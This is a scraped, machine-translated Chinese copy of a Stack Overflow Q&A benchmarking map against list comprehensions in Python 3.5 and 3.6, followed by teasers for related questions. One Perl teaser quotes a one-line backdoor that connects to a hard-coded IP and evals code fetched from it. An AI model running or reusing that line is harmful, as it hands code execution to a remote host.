Python 3.5 与 3.6 相比，是什么让 "map"比理解更慢-6ren

Python 3.5 与 3.6 相比，是什么让 "map"比理解更慢

转载作者：太空狗更新时间：2023-10-29 18:34:50

我有时用 map如果有一个用 C 编写的函数/方法来获得一些额外的性能。然而，我最近重新审视了我的一些基准测试，并注意到 Python 3.5 和 3.6 之间的相对性能(与类似的列表理解相比)发生了巨大变化。

这不是实际的代码，而只是说明差异的最小示例:

import random

lst = [random.randint(0, 10) for _ in range(100000)]
assert list(map((5).__lt__, lst)) == [5 < i for i in lst]
%timeit list(map((5).__lt__, lst))
%timeit [5 < i for i in lst]

我意识到使用 (5).__lt__ 不是一个好主意但我现在想不出一个有用的例子。

Python-3.5 上的计时有利于 map方法:

15.1 ms ± 5.64 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
16.7 ms ± 35.6 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)

虽然 Python-3.6 计时实际上表明理解速度更快:

17.9 ms ± 755 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
14.3 ms ± 128 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)

我的问题是在这种情况下发生了什么使列表理解更快，而 map解慢？我意识到差异并不大，它只是让我感到好奇，因为这是我有时(实际上很少)在性能关键代码中使用的“技巧”之一。

最佳答案

我认为公平的比较涉及在 Python 3.5 和 3.6 中使用相同的函数和相同的测试条件，以及将 map 与所选 Python 版本中的列表理解进行比较。

在我最初的回答中，我进行了多次测试，结果表明与列表理解相比，map 在两个版本的 Python 中仍然快了大约两倍。然而，有些结果并不是决定性的，所以我进行了更多的测试。

首先让我引用您在问题中陈述的一些观点:

"... [I] noticed that the relative performance [of map] (compared to a similar list comprehension) drastically changed between Python 3.5 and 3.6"

你还问:

"My question is what happened in this case that made the list-comprehension faster and the map solution slower?"

如果您的意思是 map 比 Python 3.6 中的列表推导慢，或者您的意思是 Python 3.6 中的 map 比 3.5 中的 map 慢并且列表推导的性能有所提高(尽管不一定达到 map 的水平)，这并不是很清楚。

根据我在第一次回答这个问题后进行的更广泛的测试，我想我知道发生了什么。

但是，首先让我们为“公平”比较创造条件。为此，我们需要:

map 在不同 Python 版本中使用相同函数的性能对比；

map 的性能与使用相同函数的相同版本中的列表推导进行比较；

对相同数据运行测试；

最小化时序函数的贡献。

这是有关我的系统的版本信息:

Python 3.5.3 |Continuum Analytics, Inc.| (default, Mar  6 2017, 12:15:08) 
[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)] on darwin
IPython 5.3.0 -- An enhanced Interactive Python.

和

Python 3.6.2 |Continuum Analytics, Inc.| (default, Jul 20 2017, 13:14:59) 
[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)] on darwin
IPython 6.1.0 -- An enhanced Interactive Python. Type '?' for help.

让我们首先解决“相同数据”的问题。不幸的是，由于您有效地使用了 seed(None) ，因此两个 Python 版本中的每个数据集 lst 都不同。这可能导致在两个 Python 版本上看到的性能差异。一种解决方法是设置，例如 random.seed(0) (或类似的东西)。我选择创建一次列表并使用 numpy.save() 保存它，然后在每个版本中加载它。这一点尤其重要，因为我选择稍微修改您的测试(“循环”和“重复”的数量)，并将数据集的长度增加到 100,000,000:

import numpy as np
import random
lst = [random.randint(0, 10) for _ in range(100000000)]
np.save('lst', lst, allow_pickle=False)

其次，让我们使用 timeit 模块代替 IPython 的魔法命令 %timeit 。这样做的原因来自在 Python 3.5 中执行的以下测试:

In [11]: f = (5).__lt__
In [12]: %timeit -n1 -r20 [f(i) for i in lst]
1 loop, best of 20: 9.01 s per loop

将此与相同版本的 Python 中 timeit 的结果进行比较:

>>> t = timeit.repeat('[f(i) for i in lst]', setup="f = (5).__lt__;
... import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, 
... number=1); print(min(t), max(t), np.mean(t), np.std(t))
7.442819457995938 7.703615028003696 7.5105415405 0.0550515642854

由于我不知道的原因，与 %timeit 包相比，IPython 的神奇 timeit 增加了一些时间。因此，我将在我的测试中专门使用 timeit。

注意:在接下来的讨论中，我将仅使用最短时间 ( min(t))。

Python 3.5.3 中的测试:

第 1 组: map 和列表理解测试

>>> import numpy as np
>>> import timeit

>>> t = timeit.repeat('list(map(f, lst))', setup="f = (5).__lt__; import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
4.666553302988177 4.811194089008495 4.72791638025 0.041115884397

>>> t = timeit.repeat('[f(i) for i in lst]', setup="f = (5).__lt__; import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
7.442819457995938 7.703615028003696 7.5105415405 0.0550515642854

>>> t = timeit.repeat('[5 < i for i in lst]', setup="import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
4.94656751700677 5.07807950800634 5.00670203845 0.0340474956945

>>> t = timeit.repeat('list(map(abs, lst))', setup="import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
4.167273573024431 4.320013975986512 4.2408865186 0.0378852782878

>>> t = timeit.repeat('[abs(i) for i in lst]', setup="import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
5.664627838006709 5.837686392012984 5.71560354655 0.0456700607748

请注意，第二个测试(使用 f(i) 的列表理解)明显慢于第三个测试(使用 5 < i 的列表理解)表明 f = (5).__lt__ 从代码角度与 5 < i 不相同(或几乎相同)。

第 2 组:“个别”功能测试

>>> t = timeit.repeat('f(1)', setup="f = (5).__lt__", repeat=20, number=1000000); print(min(t), max(t), np.mean(t), np.std(t))
0.052280781004810706 0.05500587198184803 0.0531139718529 0.000877649561967

>>> t = timeit.repeat('5 < 1', repeat=20, number=1000000); print(min(t), max(t), np.mean(t), np.std(t))
0.030931947025237605 0.033691533986711875 0.0314959864045 0.000633274658428

>>> t = timeit.repeat('abs(1)', repeat=20, number=1000000); print(min(t), max(t), np.mean(t), np.std(t))
0.04685414198320359 0.05405496899038553 0.0483296330043 0.00162837880358

请注意，第一次测试( f(1))明显慢于第二次测试( 5 < 1)，进一步支持从代码角度来看 f = (5).__lt__ 与 5 < i 不相同(或几乎相同)。

Python 3.6.2 中的测试:

第 1 组: map 和列表理解测试

>>> import numpy as np
>>> import timeit

>>> t = timeit.repeat('list(map(f, lst))', setup="f = (5).__lt__; import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
4.599696700985078 4.743880658003036 4.6631793691 0.0425774678203

>>> t = timeit.repeat('[f(i) for i in lst]', setup="f = (5).__lt__; import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
7.316072431014618 7.572676292009419 7.3837024617 0.0574811241553

>>> t = timeit.repeat('[5 < i for i in lst]', setup="import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
4.570452399988426 4.679144663008628 4.61264215875 0.0265541828693

>>> t = timeit.repeat('list(map(abs, lst))', setup="import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
2.742673939006636 2.8282236389932223 2.78504617405 0.0260357089928

>>> t = timeit.repeat('[abs(i) for i in lst]', setup="import numpy; lst = numpy.load('lst.npy').tolist()", repeat=20, number=1); print(min(t), max(t), np.mean(t), np.std(t))
6.2177103200228885 6.428813881997485 6.28722427145 0.0493010620999

第 2 组:“个别”功能测试

>>> t = timeit.repeat('f(1)', setup="f = (5).__lt__", repeat=20, number=1000000); print(min(t), max(t), np.mean(t), np.std(t))
0.051936342992121354 0.05764096099301241 0.0532974587506 0.00117079475737

>>> t = timeit.repeat('5 < 1', repeat=20, number=1000000); print(min(t), max(t), np.mean(t), np.std(t))
0.02675032999832183 0.032919151999522 0.0285137565021 0.00156522182488

>>> t = timeit.repeat('abs(1)', repeat=20, number=1000000); print(min(t), max(t), np.mean(t), np.std(t))
0.047831349016632885 0.0531779529992491 0.0482893927969 0.00112825297875

请注意，第一次测试( f(1))明显慢于第二次测试( 5 < 1)，进一步支持从代码角度来看 f = (5).__lt__ 与 5 < i 不相同(或几乎相同)。

讨论

我不知道这些计时测试的可靠性如何，而且也很难将影响这些计时结果的所有因素分开。然而，我们可以从测试的“第 2 组”中注意到，唯一显着改变其时间的“个体”测试是 5 < 1 的测试:它从 Python 3.5 中的 0.0309s 下降到 Python 3.6 中的 0.0268s。这使得使用 5 < i 的 Python 3.6 中的列表理解测试比 Python 3.5 中的类似测试运行得更快。然而，这并不意味着列表理解在 Python 3.6 中变得更快。

让我们将 map 的相对性能与相同 Python 版本中相同函数的列表推导进行比较。然后我们进入 Python 3.5: r(f) = 7.4428/4.6666 = 1.595 , r(abs) = 5.665/4.167 = 1.359 和 Python 3.6: r(f) = 7.316/4.5997 = 1.591 , r(abs) = 6.218/2.743 = 2.267 。基于这些相对性能我们可以看到，在 Python 3.6 中， map 的性能相对于列表理解的性能至少与 Python 3.5 中的 f = (5).__lt__ 函数相同，并且这个比率甚至在 Python 中的 abs() 等函数中有所提高3.6.

无论如何，我相信没有证据表明 Python 3.6 中的列表理解在相对和绝对意义上变得更快。唯一的性能改进是 [5 < i for i in lst] 测试，但这是因为 5 < i 本身在 Python 3.6 中变得更快，而不是因为列表理解本身更快。

关于Python 3.5 与 3.6 相比，是什么让 "map"比理解更慢，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/45601663/

文章推荐： Angular 2 货币管道在 chrome 版本 34.0.1847.131 m 中不起作用

文章推荐： python - Odoo - 为特定用户隐藏按钮

文章推荐： python - `.loc` 和 `.iloc` 与 MultiIndex'd DataFrame

haskell - 理解 (>>=) 。 (>>=)
我试图理解 (>>=).(>>=) ，GHCi 告诉我的是: (>>=) :: Monad m => m a -> (a -> m b) -> m b (>>=).(>>=) :: Mon
Java，理解
关于此 Java 代码，我有以下问题: public static void main(String[] args) { int A = 12, B = 24; int x = A,
Javascript 理解
对于这个社区来说，这可能是一个愚蠢的基本问题，但如果有人能向我解释一下，我会非常满意，我对此感到非常困惑。我在网上找到了这个教程，这是一个例子。 function sports (x){
Python语法/理解
def counting_sort(array, maxval): """in-place counting sort""" m = maxval + 1 count = [0
sorting - 理解 assembly
我有一些排序算法的集合，我想弄清楚它究竟是如何运作的。我对一些说明有些困惑，特别是 cmp 和 jle 说明，所以我正在寻求帮助。此程序集对包含三个元素的数组进行排序。 0.00 :
PHP:理解 $this - 调用基类方法而不是子方法
阅读 PHP.net 文档时，我偶然发现了一个扭曲了我理解 $this 的方式的问题: class C { public function speak_child() { //
image-processing - 理解
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。想改善这个问题吗？更新问题，使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
warnings - 理解 pragma
我有几个关于 pragmas 的相关问题.让我开始这一系列问题的原因是试图确定是否可以禁用某些警告而不用一直到 no worries。 (我还是想担心，至少有点担心!)。我仍然对那个特定问题的答案感兴
Lua - 理解 setmetatable
我正在尝试构建 CNN使用 Torch 7 .我对 Lua 很陌生.我试图关注这个 link .我遇到了一个叫做 setmetatable 的东西在以下代码块中: setmetatable(train
Perl - 理解 "botstrap"
我有这段代码 use lib do{eval&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"}; 这似乎导入了一个库，但
Haskell 中的函数——理解
我有以下代码，它给出了 [2,4,6] : j :: [Int] j = ((\f x -> map x) (\y -> y + 3) (\z -> 2*z)) [1,2,3] 为什么？似乎只使用了“
haskell - 理解 (.) 的类型签名
我刚刚使用 Richard Bird 的书学习 Haskell 和函数式编程，并遇到了 (.) 函数的类型签名。即 (.) :: (b -> c) -> (a -> b) -> (a -> c) 和相
scala - 理解 `andThen`
我遇到了andThen ，但没有正确理解它。为了进一步了解它，我阅读了 Function1.andThen文档 def andThen[A](g: (R) ⇒ A): (T1) ⇒ A mm是 Mu
JavaScript .call 理解
这是一个代码，用作 XMLHttpRequest 的 URL 的附加内容。URL 中显示的内容是: http://something/something.aspx?QueryString_from_b
javascript - 理解 Promise.all
考虑以下我从 https://stackoverflow.com/a/28250704/460084 获取的代码 function getExample() { var a = promise
Scala:理解::: 运算符
将 list1::: list2 运算符应用于两个列表是否相当于将 list1 的所有内容附加到 list2 ？ scala> val a = List(1,2,3) a: List[Int] = L
Dart map 理解
在python中我会写: {a:0 for a in range(5)} 得到 {0: 0, 1: 0, 2: 0, 3: 0, 4: 0} 我怎样才能在 Dart 中达到同样的效果？到目前为止，我
javascript - 理解 setTimeout
关闭。这个问题需要多问focused 。目前不接受答案。想要改进此问题吗？更新问题，使其仅关注一个问题 editing this post . 已关闭 5 年前。 Improve this ques
makefile - 理解 Makefile
我有以下 make 文件: CC = gcc CCDEPMODE = depmode=gcc3 CFLAGS = -g -O2 -W -Wall -Wno-unused -Wno-multichar
Haskell 理解 fmap
有人可以帮助或指导我如何理解以下实现中的 fmap 函数吗？ data Rose a = a :> [Rose a] deriving (Eq, Show) instance Functor Rose

太空狗

个人简介

我是一名优秀的程序员,十分优秀！

作者热门文章

滴滴打车优惠券免费领取

全站热门文章

首页

博学

6Ren·AI

商城

Python 3.5 与 3.6 相比，是什么让 "map"比理解更慢